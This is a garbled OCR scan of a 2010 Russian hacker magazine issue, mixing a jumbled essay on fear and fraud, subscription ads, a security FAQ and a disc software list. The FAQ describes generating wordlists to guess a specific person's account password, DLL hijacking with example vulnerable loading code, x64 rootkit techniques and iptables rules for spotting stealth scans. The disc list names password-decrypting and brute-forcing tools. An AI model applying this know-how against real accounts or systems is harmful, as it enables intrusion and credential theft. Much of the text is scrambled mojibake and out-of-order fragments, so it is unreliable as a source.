— здесь играет роль интеллектуальная продвинутость агента. что они обладают даром запудривания мозгов и устрашения верящих в чудеса людей — это понятно любому здравомыслящему человеку. а вмятина? Один мой знакомый как-то раз влетел в черный джип. Вроде ничего серьезного или вообще не нарушал. страх носит панический характер. специалистов парапсихологии и целителей. чем зацикливаться на чем-то плохом. мне бог подает все. и православные свечи. и возможно. но при этом чуть позже: найду новую работу с более приятным начальником. а внушенный. но для полного счастья дам еще несколько практических советов: Если при их виде похолодело и сжалось внутри. А если это будет не царапина. а потому что зацикливаешься и начинаешь замечать предмет опасений и тяготеть к нему. выплаченная родственникам после смерти застрахованного. у страха глаза велики. но. Потому что «А вдруг…?». И спрогнозируй несколько вариантов развития ситуации и своего поведения в ней. все проблемы в жизни из-за нее. и какие-то древние свитки подозрительного вида. то уже знаешь. Анализируй корни своих страхов и устраняй их. как правило. В худшем случае получишь отказ. опять надуманная опасность и реальный финансовый отстег. anyway — лучше размышлять о позитивном исходе. находятся и иконы. что если Вы врежетесь в дорогую машину. все равно не убежишь. что в целом дает неплохой замес для влияния на психику доверчивых граждан. В общем. что порча снимается только через деньги? Да. Умные люди говорят: решай проблемы по мере их поступления.е. и чьи-то черепа и кости. этого достаточно. чтобы спасти себе жизнь с помощью «потомственного». рассудок уже был не особо светлым). значит. как один мужчина купил новенький Бентли. Не бойся неизвестности. Для тех. ÃÈÁÄÄ Думаю. Создавая таинственную мишуру вокруг себя. Как будто сумма. хоть и возможны незначительные вариации: «У тебя проблема? Таааак. всеумеющего полубога-полудьявола. Да. Волей-неволей начинаешь задумываться: а вдруг и я могу стать жертвой. что она ничего не стоит по сравнению с твоей безопасностью. пересмотрю свое отношение к наемному труду. Я вспоминаю. а на следующее утро его украли… Да. Надеюсь. милый. и совсем скоро начнется действие. и клиент бежит занимать деньги или вскрывать заначку. Страх за свою жизнь и благополучие затмевает рассудок (хотя. многие из нас сталкивались с сотрудниками страховых компаний. лег спать. Не потому что «чудеса». откуда тревога и негативные ощущения — ты сразу же можешь предпринять что-либо для ликвидации опасных обстоятельств. но и может привлечь в твою жизнь то. которые тебе присущи. 2. Я себе ни копейки не беру! Я помогаю людям с божьей помощью. но то. в итоге получив за это деньги (естественно. что написано выше. пока ты о нем помнишь. 4. ведь по сути никто из нас не застрахован… И тут: оппа! «Вы еще не застрахованы?! Мы предлагаем застраховать Вас от падения самолета на голову!». его страховки не хватило — и хозяин джипа угрожал ему расправой! Оно Вам надо? Может лучше доплатить лишние 30 у. у кого клиенты атеистичны и не особо доверчивы. Но. но и тех. поэтому мне деньги не нужны. наконец отдохну» и тому подобное. что страх — это всего лишь эмоция. ты не хочешь отдавать крупную сумму за воздух. Что делать будем? Ты знаешь. приходит — а квартира его взломана и ограблена. да. через деньги и снимать надо. уверяя себя. И только глупые ничего не делают и боятся. чтобы избавиться от многих страхов. Помни о том. то сумма обычного полиса не покроет убытки. В лучшем случае… вариантов много. как видишь. что еще не произошло — это не только портит нервы. В реальности у тебя есть выбор: бояться или не бояться. милый. А чего в детстве боялся ты? Ãîññëóæáû: ñòðàõîâùèêè.UNITS ние. ты разве не знал? Через деньги ставится. и ты непроизвольно вкладываешь в права крупную купюру. В одном помещении. которые в обязательном порядке страхуют твой автомобиль. кем он внушается. могут навести порчу и наоборот — спасти от нее. По такой же «схеме» работают патрульные наряды милиции. какие имеет признаки. или вообще конфискуют автомобиль и дадут пожизненное заключе- 138 Обладают ли даром исцеления и сотворения чудес потомственные маги. но при этом жизнь продолжится — уже без страха. Создается образ могущественного.

óë. 3. в том числе курьером по Москве в пределах МКАД . 2. ÂÎÏÐÎÑÛ. ÃÎÄÎÂÀß ÏÎÄÏÈÑÊ À ÏÎ ÖÅÍÅ 2100 ðóá. ÇÀ 6 ÌÅÑßÖÅ Единая цена по всей России. Доставка за счет издателя. ÍÀ ÃÎÄÎÂÎÉ ÏÎÄÏÈÑÊÅ! Çàìó÷èëèñÿ èñêàòü æóðíàë â ïàëàòêàõ è ìàãàçèíàõ? Íå õî÷åøü òðàòèòü íà ýòî âðåìÿ? Íå íàäî. вырезав их из журнала. ä.ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•ÑÅÐÂÈÑ ÝÒÎ ËÅÃÊÎ! 8. • ïî ôàêñó 8 (495) 780-88-24. ÑÒÎÈÌÎÑÒÜ ÇÀÊÀÇÀ: 2100 ÐÓÁ. 11. ÇÀ 12 ÌÅÑßÖÅ 1200 ÐÓÁ.glc. ÅÑÒÜ ÂÎÏÐÎÑÛ? Звони по бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для жителей других регионов России. ÎÎÎ «Ãåéì Ëýíä». Разборчиво заполни подписной купон и квитанцию.ru. ÇÀÌÅ×ÀÍÈß È ÏÐÅÄËÎÆÅÍÈß ÏÎ ÏÎÄÏÈÑÊÅ ÍÀ ÆÓÐÍÀË ÏÐÎÑÈÌ ÏÐÈÑÛËÀÒÜ ÍÀ ÀÄÐÅÑ info@glc. ÂÍÈÌÀÍÈÅ! Подпиcка оформляется в день обработки купона и квитанции с номера. БиЛайн и Мегафон). 44.5 Ãá ÁÓÄÜ ÓÌÍÛÌ! DVD ÕÂÀÒÈÒ ÏÅÐÅÏËÀ×ÈÂÀÒÜ Â ÊÈÎÑÊÀÕ! ÑÝÊÎÍÎÌÜ 660 ÐÓÁ. то подписку можно оформить с марта. Ìîñêâà. ñòð. îòäåë ïîäïèñêè. Вышли в редакцию копию подписных документов — купона и квитанции — любым из нижеперечисленных способов: • ïî ýëåêòðîííîé ïî÷òå subscribe@glc.ru прошу выслать бесплатный номер журнала 1. • ïî àäðåñó 119021. Ìû ñàìè ïîòðàòèì âðåìÿ è ïðèâåçåì òåáå íîâûé âûïóñê Õ. Например. сделав ксерокопию или распечатав с сайта shop. Еще один удобный способ оплаты подписки на твое любимое издание — в любом из 72 000 платежных терминалах QIWI (КИВИ) по всей России. если произвести оплату в январе. Òèìóðà Ôðóíçå. Оплати подписку через любой банк.ru. Äëÿ æèòåëåé Ìîñêâû (â ïðåäåëàõ ÌÊÀÄ) äîñòàâêà ìîæåò îñóùåñòâëÿòüñÿ áåñïëàòíî ñ êóðüåðîì èç ðóê â ðóêè â òå÷åíèå òðåõ ðàáî÷èõ äíåé ñ ìîìåíòà âûõîäà íîìåðà íà àäðåñ îôèñà èëè íà äîìàøíèé àäðåñ. абонентов сетей МТС. выходящего через один календарный месяц после оплаты.

д. если админ убрал все баннеры.UNITS Антон «ant» Жуков faq united @real. развивается именно в этом направлении. myspace и т. Userpass. сервера и т. На данный момент программа поддерживает 250 плагинов.д. по кото- варь для подбора пароля к аккаунту конкретного рым можно было определить CMS. Напомню. как настроен веб-сервер. Работа со скриптом проста: $ . как можно определить движок Q: Подскажи простой способ сгенерировать сло- сайта. Если жертва указала в профиле свои аккаунты facebook. Но теперь точно могу сказать: «Да». как CeWL (www.py "name". Например. К счастью таковые имеются. идентифицирующих CMS по различным признакам. даже если админ удалил тэг WordPress. путешествуя по заданному сайту до указанной глубины.com. morningstarsecurity.php). Поэтому уже давно существуют специальные инструменты. что нашумевший руткит TDL3.org/projects/cewl. как ты посещаешь какой-либо вебсайт.ru Q: Подскажи. Например. morningstarsecurity. В процессе того. который надолго поселился в головах исследователей из антивирусных компаний. pauldotcom. • s — с помощью этой опции задаются дополнительные параметры для поиска (например. это не собьет сканер с толку.д. передающихся CeWL. платформы для блогов. так и названием компании (в данном случае будет сгенерирован словарь для всех работников данной компании ). все очень просто. принимая в качестве параметра только URL.. Одним из лучших является Whatweb (www. умеет генерировать словари.py) — небольшой скриптик на Python.xakep.py (www.com/userpass. Сейчас совершенно очевидно. Использовать сканер очень просто. digininja.ru/issue003/tdss-botnet). ссылки на которые надо отпарсить после выполнения поискового запроса Гугл. достаточно передать ему в качестве параметра адрес сайта: A: Пентестеры и хакеры сталкиваются с этой задачей практически каждый день. Однако количество установок новой Win7 x64 XÀÊÅÐ 10 /141/ 10 ./whatweb www. с помощью какого ПО создавалась страничка и т. можно заточить скриптик под свои собственные нужды.com/research/whatweb) — веб-сканер нового поколения. так как плагин для WordPress будет искать еще строку «wp-content». что TDL3 считается одним из самых передовых руткитов на сегодняшний день (подробнее можно прочитать в этой статье — www. Параметр name может быть как именем отдельного человека. то можно задать «security»). который с помощью Google ищет человека на Linkedin. человека. JavaScriptбиблиотеки. и привыкли по максимуму автоматизировать свою работу. определить движок сайта на глаз не всегда представляется возможным. умеющий идентифицировать системы управления контентом (CMS). Q: Есть ли руткиты для x64? A: Еще некоторое время назад я был бы не уверен. Однако хакеры — люди ленивые :).nobunkum. и без использования специальных инструментов тут никак не обойтись. если компания/человек занимается безопасностью. такой инструмент. браузер получает массу невидимой информации о том. Вдобавок. • m — задает минимальную длину слов. а затем натравливает на найденный профиль CeWL. которые умеют генерировать списки паролей. A: Действительно. У программы есть несколько интересных опций: • g — отвечает за количество страниц.com 140 $ python userpass. то данные для создания словаря берутся и оттуда. Как видишь.

• Приложение подготовлено для обработки ситуаций. Это странно. система Windows сообщает о сбое загрузки DLL. Q: Объясни на пальцах. Известно. • Каталог 16-разрядной версии системы. которое позволяет разработчикам и администраторам тщательно отслеживать поведение выполняемого процесса. позволяющие инсталлировать на эту платформу. Следует помнить. приложение может попытаться загрузить его из текущего рабочего каталога. Запускается он следующим образом: • распаковываем архив DLLHijackAuditKit. используя наименее безопасный путь поиска. Для предотвращения описанной атаки можно удалить текущий рабочий каталог приложения из порядка поиска DLL.постоянно растет. а затем добавить в порядок поиска каталог установки подключаемого модуля с помощью функции SetDllDirectory("каталог_установки_модуля"). Попробуй запустить приложение. Если библиотеку удается обнаружить в по рядке поиска DLL. Ниже указан порядок поиска DLL для функций динамической загрузки DLL LoadLibrary и LoadLibraryEx. определите его расположение и используйте с функцией LoadLibrary XÀÊÅÐ 10 /141/ 10 Перводим контроллер флешки в режим HDD полный путь. Если приложение загружает подключаемые модули сторонних компаний и не может использовать полный путь к ним при вызовах функции LoadLibrary. Авторы нового TDL4 используют техники заражения MBR и старта вредоносного кода раньше самой операционной системы. HMODULE handle = LoadLibrary("schannel. как показано на скриншоте. Для этого нужно вызвать функцию API SetDllDirectory с пустой строкой ("").com/en-us/ sysinternals/bb896645. позволяющие отыскать вызовы небезопасных функций загрузки библиотек? A: Мама-Microsoft зарелизила приложение Process Monitor. что некоторые разработчики используют функцию LoadLibrary для проверки наличия отдельных DLL с целью определения текущей версии Windows. Рассмотрим описанную ниже ситуацию. Если злоумышленник поместит библиотеку с таким именем в текущий рабочий каталог. Факт использования уязвимого сразу пути будет отображен программой. что за новые атаки — DLL-инъекции? A: Есть несколько разновидностей этой атаки. • Текущий рабочий каталог. из которого загружено приложение. • Приложение загружает библиотеку DLL. Q: А можешь дать примеры небезопасной загрузки библиотек в исходном коде? A: В примере кода ниже приложение выполняет поиск библиотеки «schannel.org). существуют. В примере кода ниже приложение пытается загрузить библиотеку из разных расположений приложения и операционной системы. Самые распространенные — атаки на основе функции LoadLibrary. потому что механизмы. Подобные методологии уже активно применялись такой малварью. система Windows пытается найти ее путем линейного поиска в определенном наборе каталогов (так называемый порядок поиска DLL). Далее необходимо настроить фильтры средства Process Monitor — задай все. когда найти библиотеку не удастся. DWORD retval = SearchPath(NULL. Если нужный файл отсутствует. • копируем в эту же директорию procmon. которая предположительно находится в текущем рабочем каталоге приложения. Теперь 141 .exe (это бинарник Process Monitor). result. переходим в директорию DLLHijackAuditKit. Тот же концепт (Disable PatchGuard & Driver signature enforcement) механизма обхода проверки подписи в x64 появился еще в начале года в публичном доступе. • Система Windows выполняет поиск библиотеки в соответствии с порядком поиска DLL и обнаруживает нужный файл в текущем рабочем каталоге приложения. К тому же разработчик Metasploit разработал на Ruby довольно простую утилиту DLLHijackAuditKit (http://bit. • устанавливаем интерпретатор Ruby (rubylang. • Каталог. • Каталог Windows. • Злоумышленник знает об этом и контролирует текущий рабочий каталог приложения. как Mebroot. • Он копирует собственную специально созданную версию библиотеки в текущий рабочий каталог. • Каталоги. что это может сделать приложение уязвимым. что у злоумышленника есть соответствующее разрешение. она загружается.ly/ DLLHijackAuditKit) для автоматизированного поиска уязвимых приложений. описанных в начале данного документа. Так что. • Системный каталог.dll". следует удалить текущий рабочий каталог из порядка поиска DLL с помощью функции SetDllDirectory(""). Например. а руткит до этого момента до сих пор не умел осваиваться в системе. Если приложение зависит от загрузки библиотеки DLL из текущего каталога. с помощью функции LoadLibrary(). дважды щелкни файл с расширением. err. С помощью средства Process Monitor (http://technet. обработчик которого назначен данному приложению.aspx) можно динамически определять. в ближайшее время x64 уже перестанет быть помехой. используя определенный каталог в качестве текущего рабочего. чем в предыдущем. в которой выполняется приложение. уязвимы ли приложения для описанных атак.dll». злоумышленник может поместить в текущий рабочий каталог библиотеку с таким же именем. NULL). как приложение выполнит поиск нужного файла в каталогах Windows. ". без указания полного пути. Однако если ее не удается найти ни в одном из каталогов порядка поиска DLL. В этом сценарии специально созданная библиотека DLL запускается в приложении и получает права текущего пользователя. вероятно. HMODULE handle = LoadLibrary(result). указанные в переменной среды РАТН. Если соответствующая библиотека в действительности отсутствует в среде Windows. Предполагается. "schannel". Когда приложение динамически загружает библиотеку DLL без указания полного пути.dll"). Далее через «Пуск» выбираем «Start Command Prompt with Ruby». В этом примере уровень риска немного ниже. Q: А есть ли тулзы.microsoft. она будет загружена еще до того.

условие соответствует тем пакетам.malzilla. которые надо проверить. позволяющий обращаться к сервисам гугла из командной строки. сравнимой с полностью компилируемыми языками. Q: Составляю подборку для изучения вредоносных PDF-файлов. В результате использования специального модуля на i386 процессорах можно добавиться 2-100-кратного увеличения производительности. так и Linux.kowalczyk.net/mupdf) — альтернативные просмотрщики. то в системе будет определяться только один из разделов.email > contacts. необходимо будет экспортировать CSV-лог из ProcMon'а. Q: Есть ли возможность.bat» и готовимся закрыть множество всплывающих окон! После того. Origami extractjs и Jsunpack-n’s pdf. Таким образом. Есть ли способ увеличить скорость? A: Есть. а также декодирует PDF-файлы. параноидальным) причинам ты все-таки хочешь отлавливать подобные прецеденты.FIN FIN» описывают комбинацию TCP-флагов. Для этого переходим в директорию DLLTest и запускаем там скрипт «ruby generate. поэтому запускать ее придется в режиме совместимости. не заработает.com/programs/ pdf-tools) — определяет.info/software/ sumatrapdf) и MuPDF (ccxvii.net) показывает. то мы сможем поделить накопитель на несколько разделов.html) — извлекает и декодирует JavaScript из PCAP-дампов-снифера.rb». Даже если поделить каким-нибудь независимым от винды средством вроде GParted (LiveCD на базе Linux'а). под Vista/Windows7 она по умолчанию не работает. а также может быть полезен для деобфускации JavaScriptкода. PDF-parser — выявляет ключевые элементы PDF без рендеринга документа (и соответственно возможности заражения). обращаться к сервисам Google из командной строки? Хочу автоматизировать скачивание фотографий c Picasa Web. что выполнять код на Python Все эти консольные утилиты работают через Google Data API и доступны как для Windows. ассоциированную со скриптами или действиями. когда нужно скрыть сам факт сканирования.jpg Âèäåîõîñòèíã Youtube: $ google youtube post --category Education killer_robots.FIN FIN -j DROP Параметры «--tcp-flags ACK. в которых есть FIN-флаг. которые обрабатывает данные.sourceforge.csv Google Docs: $ google docs edit --title "Shopping list" Õðàíèëèùà ôîòîãðàôèé Picasa: $ google picasa create --title "Cat Photos" ~/photos/cats/*. После этого остается проверить полученные результаты с помощью специального скрипта.org) — извлекает и декомпрессирует потоки из PDF.blogspot. а работает он медленно.FIN) указывает флаги. Подскажи инструменты. При нормальном TCP-соединении эта комбинация 142 невозможна. A: Да. если открыть любым менеджером разделов (скажем. Если по каким-то (вероятно. что Windows считает: раз это флешка. Увы. в которых сплоит. возможно. совсем недавно появился пакет googlecl (code. Больших знаний и умений она не требует: достаточно выбрать из списка букву нужной флешки и нажать на кнопку «Flip Removable Bit». Фильтры ProcMon'а для поиска DLL Injection запускаем «audit. что с некоторыми флешками такой фокус все-таки не проходит. стоит заметить. поэтому системный журнал редко такое сканирование фиксирует. какие из них установлены. После этого тулза попросит вытащить флешку и вставить ее обратно. Одно из решений проблемы — заставить систему определять пендрайв не как флешку. Вуаля. но нет ACK. в зависимости от кода.google. Sumatra PDF (blog. Проект Psyco (psyco. это легко делается с помощью firewall'а. В инете можно найти следующие варианты: iptables -A INPUT -p tcp --tcp-flags ACK. Первый список состояний (ACK. Для этого контроллер флешки нужно перевести в режим HDD. а как сменный жесткий диск. Примеры использования: Ñåðâèñ áëîãîâ Blogger: $ google blogger post --title "foo" "command line posting" Êàëåíäàðü Calendar: $ google calendar add "Lunch with Jim at noon tomorrow" Êîíòàêòû Contacts: $ google contacts list name.py — извлекает JavaScript-код из PDF-файлов.UNITS можно на скорости. то у нее может быть только один раздел. если PDF-документ содержит строку. как программа сделает все итерации. z XÀÊÅÐ 10 /141/ 10 . в чем в большинстве случаев может помочь утилита BootIt. второй (FIN) проверяет.FIN FIN -j LOG --log-prefix "Stealth scan" iptables -A INPUT -p tcp --tcp-flags ACK. Q: Как бы ускорить выполнения кода на Python? Есть скрипт. что свидетельствует о скрытом сканировании.com/p/googlecl). Q: Можно ли разбить флешку на несколько дисков? A: Основная проблема в том. Origami pdfscan — определяет подозрительные строки. Jsunpack-n (jsunpack.avi Написал его быстро.org/origami) — изучает структуру PDF-файла. Origami Walker (security-labs. Правда.com/2009/06/ jsunpack-n-updates-for-pdf-decoding. Методика использует нестандартные комбинации флагов TCP-пакетов. через «Управление дисками» в системе).didierstevens. Q: Как распознать скрытое сканирование Nmap? A: Метод скрытого сканирования Nmap используется в том случае. A: PDFiD (blog. Malzilla (www.

0 Home Ftp Server 1.13 RC >Games GunGirl 2 v1.7 Samba 3.1 Nitro++ 1.0.61 PuTTY 0.1.11.4.4.3 Postfix 2.2b1 Komodo Edit 5.7 Mitter 0.1.2 Cvechecker 0.3 RSMangler 1.1 PyScripter v2.8 Google Chrome 5.7.48 SetupBatteryCare 0.6.3.3.4.1.0.20 Wireshark 1.1.9.4.20 Iptables 1.04 SUMo 2.11 Все для Python: ActivePython 2.2.0 KeyPass 4.41 RegSeeker 1.5 DotDotPwn 1.0.4.5 Mozilla Firefox 3.0.3 GNU make 3.4 MongoDB 1.0b3 Komodo IDE 5.6 Whoosh 0.3.11.1 Sipwitch 0.0 CLIcompanion 1.6 DLLHijackAuditKit v2 DllHijackAuditor 1.2 Poppler 0.2 Eric5 5.1 ssh2ftpcrack 2.0.7.0 xsser 0.0 ProcNetMonitor RIPS 0.3 WebIssues 0.95 TechPowerUp GPU-Z v0.3.0.6 x 10 (ОКТЯБРЬ) 2010 141 METASPLOIT FRAMEWORK ÂÅÁ-ÊÀÌÅÐÀ ÍÀ ÑÅÐÂÎÏÐÈÂÎÄÀÕ ÊÐÓÃÎÂÀß ÎÁÎÐÎÍÀ LINUX ÄÅÑÊÒÎÏÀ ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.50 Nsd 3.1 Audacious 2.6.1 Inkscape 0.7 Vsftpd 2.5.90 Grindstone 2 HashTab 3.1 CUPS 1.4 Listener 2.1 Daphne 1.0.4 Komodo Edit 6.2.28 MySQL 5.3.5 >Server Apache 2.3 QIP 2010 Build 4000 Skype 5.4.3.2.5 Wireshark 1.3.2 IEPasswordDecryptor 1.1.2.4 ZinjaI 20100829 >>UNIX >Desktop Adobe Reader 9.3.1225 Far Manager v2. НА ÑÒÐ.04 Sandboxie 3.3.13 Cairo-dock 2.6 Download Master 5.4 System Silencer 1.7 Opera 10.7.4.16 DHCP 4.10 Wpbruteforcer RabbitMQ 2.0 DynamicLoadLibraryTest ExploitMyUnion 2.1.60 Skype 4.1.4.15.8.2.8 OpenMeetings 1.2 Lifeograph 0.8.375.0.9.0.0.1 Jython 2.6 >Security ChromePasswordDecryptor 1.11.0.8 Wine 1.3 Ora2Pg 6.2 Sysinternals Suite Total Commander 7.7 x64 Python 3.0.37 Beta Process Hacker 2.1 Shotwell 0.47 FilerFrog 2.0 Droid 0.28 Claws Mail 3.8 Camouflage v1.0.4 DBMail 2.7 Halberd 0.0.6.4 Songbird 1.2 Ruby 1.82 iText 5.8.1 K-Lite Mega Codec Pack 6.6 Deluge 1.4 Imagination 2.0 Vaadin 6.0 FreeApps v1.0 Xorg server 1.05 Pidgin for Windows 2.9.1.1 Sdcc 2.10.6.2 SCons 2.3 DigiKam 1.127 Lightspark 0.2 True Launch Bar 4.5 Greenshot 0.6 FOCA Free 2.1 Feh 1.0 Myjit 0.1.1.0 Picasa for Windows 3.22.4 Boxee 0.5.124 VLC (VideoLAN) for Windows 1.6 OpenLDAP 2.1.8 Bluez-tools 0.0 Suricata 1.1.2 DrPython 3.150 Auslogics Registry Cleaner 2.1.10 Wing IDE Professional 4. 34 СТР.7.8.0.39 PixelLight 0.10 ECMerge 2.5 Emsisoft HiJackFree 4.2.146 LanTopolog 2.4 >Net Balsa 2.9.9.9.9 GCstar 1.1 IronPython 2.4.0 Beta TekSIP 2.96.6.0.1 FuzzDiff Graudit 1.4 NTFS-3G 2010.6.1.0 WinAppDbg 1.6.97.2beta >Multimedia AnyToISO DualVR 1.1 Glippy 0.1.4 amaroK 2.4 >System AstroGrep 4.0.6 QGIS 1.0 build 1420 x86 FileZilla Client 3.7 Lighttpd 1.8 NirCmd 2.4.9.2.6 RSSOwl 2.5.1 >Games ManiaDrive 1.3 PWGen 2.9.8. 54 ÊÎÍÔÅÐÅÍÖÈß HACK IN THE BOX ÎÒ ÏÅÐÂÎÃÎ ËÈÖÀ ÍÀØÈ ÍÀ HITB ÑÒÐ.7.9.0.0 GMER 1.0.26 BIND 9.20.0 Clojure 1.14. 48 CALLBACK: ÝÊÎÍÎÌÈß ÍÀ ÑÂßÇÈ ТУЛКИТ ДЛЯ СОЦИАЛЬНОЙ ИНЖЕНЕРИИ Я .1.4.5 QtiPlot 0.3 VLC 1.48 KMyMoney 4.0 Nufw 2.7a >Net Ad Muncher v4.65 DAEMON Tools Lite 4.1 Voidssh WhatWeb 0.98 Speccy 1.2a Python 2.8 TeamViewer 5.0.92 q4wine 0.7 Python 2.3 Synergy 1.3 Midori 0.8252 Vuze 4.8 PCSX-Reloaded 1.9 Virtual Router >System ATI Catalyst 10.4.2 >Devel ATI Stream SDK 2.55 Unlocker 1.1 Pydev for Eclipse 1.2 gnash 0.2.3 Format Factory 2.35.2.0 RadioTray 0.4 Komodo IDE 6.2 boost 1.0 CrystalDiskMark 3.1.2.AA ÂÛÁÈÐÀÅÌ ËÅÃÊÎÂÅÑÍÎÅ VPN-ÐÅØÅÍÈÅ ÑÒÐ.0 VideoInspector 2.4.0.0 Clamav 0.3 NmapSI4 OperaPasswordDecryptor 1. 66 ÐÓÒÎÂÛÅ ÏÐÈÂÈËÅÃÈÈ ÍÀ ÑÅÐÂÅÐÅ ÊÎÐÏÎÐÀÖÈÈ AOL ÍÎÊÀÓÒ ÄËß AOL ОКТЯБРЬ 10 (141) 2010 РЕ КО М ЦЕ ЕН НА Д : 2 ОВА 10 Н р.9.119 SBackup 0.9 Beta Build 32193 BluetoothView 1.0 XnView 1.>Misc AltDrag 0.1.2 UltraEdit 16.0.5 НОКАУТ ДЛЯ AOL/ РУТОВЫЕ ПРИВИЛЕГИИ НА СЕРВЕРЕ КОРПОРАЦИИ AOL № 10(141)ОКТЯБРЬ 2010 x >>WINDOWS >Dailysoft 7-Zip 4.6.0 ZFS 0.1.0 Find and Run Robot 2.2.5.4.18 Wt 3.1 Smb4k 0.9 Linux Kernel 2.7.19.2.44.0 Vim 7.2 x64 Spyder 1.0 Firewall Builder 4.2.61 Qwit 1.45 ProgDVB 6.3 Links 2.40 digsby Build 82 Beta gpg4win 2.4 Squid 3.0 beta 2 TeamSpeak Client for Windows 3.3.9.35 Comodo Internet Security (32bit) 5.9.0 Fructose 0.2.2.18 CDEmu 1.7.6.6.32 Vera 0.2 >Security CeWL 3.8 VirtualBox 3.10.40 BlueScreenView v1.2 Opera 10.5 Freeradius 2.8.5.23 OpenSSH 5.2 Python 3.55 Synchronicity 4.2 Notepad++ 5.4 Webilder 0.0.2.4.6 OpenVPN 2.3.0b4 >Development ClickHeat 1.15281 Open Hardware Monitor 0.9.0 Dovecot 2.4 Wing IDE 101 3.9 HAproxy 1.0g Driver Magician 3.1 FirePassword 3.0 Miranda IM v0.5 Seesmic 0.4 Auslogics Disk Defrag 3.8 foobar2000 1.35.0 Ejabberd 2.4.8 Build 115.3.2 Drivel 3.0b3 Portable Python 1.0 dd_rescue 1.1.6 Nikto 2.2 geany 0.46.2.9 Visual Router Torrent 2.10 Wing IDE Professional 3.0.5 KOffice 2.1 Firefox 3.28 CCleaner 2.

tv.howsecureismy password. У западных фрилансерских бирж (GetAFreelancer. Для проверки надежности пароля HOW SECURE IS MY PASSWORD? www. К счастью. после чего быстро снимать перечисленные деньги через любой банкомат.com). поделенное на количество перебираемых паролей в секунду. которая является излюбленной платежной системой на западе.net. Карта стоит небольших денег и в течение нескольких недель приходит в Россию по обычной почте. TORRENTZ Для поиска . сделать сноски. Для вывода средств тебе остается только указать параметры своего аккаунта в Payoneer. Вводишь название файла и получаешь ссылки на . Достаточно зайти на сайт howsecureismypassword. 2torrents. Впрочем. отмечать клики мыши. С помощью Payoneer можно даже принимать платежи по PayPal.payoneer. что такой пасс сбрутится на обычном PC за 30 секунд.net. возведенное в степень длины пароля. В результате получается примерное время в секундах. 144 Для создания скринкастов и интерактивных инструкций IORAD www.torrentz. затемняя весь остальной экран. но зато для наших ресурсов есть другие поисковики: torrtilla.iorad. Теперь же вместо вменяемых ссылок на трекеры в результатах получаешь кучу спама от фейковых порталов вроде torrentdownloads. простой «abcdefg1234567» — 5722 года. Но если на скринкаст наложить красивые комментарии в виде всплывающих плашек.com.torrent для скачивания чего-либо достаточно было набрать в Google «название файла . которые отлично работают в России. чтобы доказать человеку. русские трекеры они обходят стороной. ввести «gfhjkm» (слово «пароль» в латинской раскладке) и показать.com Когда-то давно. oDesk. Увы. теперь все они стали поддерживать метод выплат с помощью карточек от компании Payoneer (www. поэтому я очень быстро стал использовать специальные torrent-поисковики. RentACoder. kinobaza.torrent с информацией о сидерах и личерах. Для западных трекеров одними из самых лучших сервисов являются torrentz. Не надо ничего устанавливать на компьютер.torrentфайлов www. не нужно грузить его математикой.payoneer. Вообще потестить пароли довольно интересно: сразу становится видно. Заниматься фильтрацией вручную — задача неблагодарная.com Скринкасты — удобнейший инструмент. а на. чтобы найти . если нужно что-то продемонстрировать. казалось бы. то получается и вовсе идеальная интерактивная инструкция. для начала работы необходимо лишь зарегистрироваться на сервисе и нажать кнопку «Capture».net Скорость подбора с помощью пароля можно описать нехитрой математической формулой: количество возможных символов. Создать не просто скринкаст. eLance) долгое время были свои порядки вывода денег.com и isohunt. XÀÊÅÐ 10 /141/ 10 .UNITS HTTP:// WWW2 PAYONEER Для приема платежей от западных заказчиков www. выделять важные элементы или окна.torrent». что на деле означает простой пароль. что длина пароля намного важнее его сложности.ru.org. Для взлома «#R00t$H3ll» уйдет 195 лет. а именно интерактивные мануалы с подробными комментария ми и сопутствующими эффектами позволяет веб-сервис IORAD.com Нас часто спрашивают: «Как получить деньги за работу от иностранного заказчика?».

.

Реклама .

Sign up to vote on this title
UsefulNot useful